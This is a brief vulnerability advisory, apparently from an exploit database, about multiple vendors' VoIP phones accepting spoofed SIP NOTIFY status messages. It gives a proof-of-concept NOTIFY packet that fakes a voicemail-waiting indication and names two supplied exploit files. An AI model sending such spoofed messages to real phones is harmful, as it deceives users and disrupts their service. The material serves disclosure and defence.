Multiple Vendor VoIP Phones Spoofed SIP Status Message Handling Weakness

Multiple Vendor VoIP Phones Spoofed SIP Status Message Handling Weakness

An exploit is not required.

The following proof of concept example is available:
UDP-Message from Attacker to Victim

Session Initiation Protocol
Request-Line: NOTIFY sip:login@10.1.1.2 SIP/2.0
Message Header
Via: SIP/2.0/UDP 15.1.1.12:5060;branch=000000000000000
From: "asterisk" <sip:asterisk@10.1.1.1>;tag=000000000
To: <sip:login@10.1.1.2>
Contact: <sip:asterisk@10.1.1.1>
Call-ID: 00000000000000@10.1.1.1
CSeq: 102 NOTIFY
User-Agent: Asterisk PBX
Event: message-summary
Content-Type: application/simple-message-summary
Content-Length: 37
Message body
Messages-Waiting: yes\n
Voicemail: 3/2\n

A proof of concept (SIP_NOTIFY_POC.pl) has been supplied by <DrFrancky@securax.org>.

Tobias Glemser <tglemser@tele-consulting.com> has provided an exploit (snf.zip) as well:

/data/vulnerabilities/exploits/SIP_NOTIFY_POC.pl
/data/vulnerabilities/exploits/snf.zip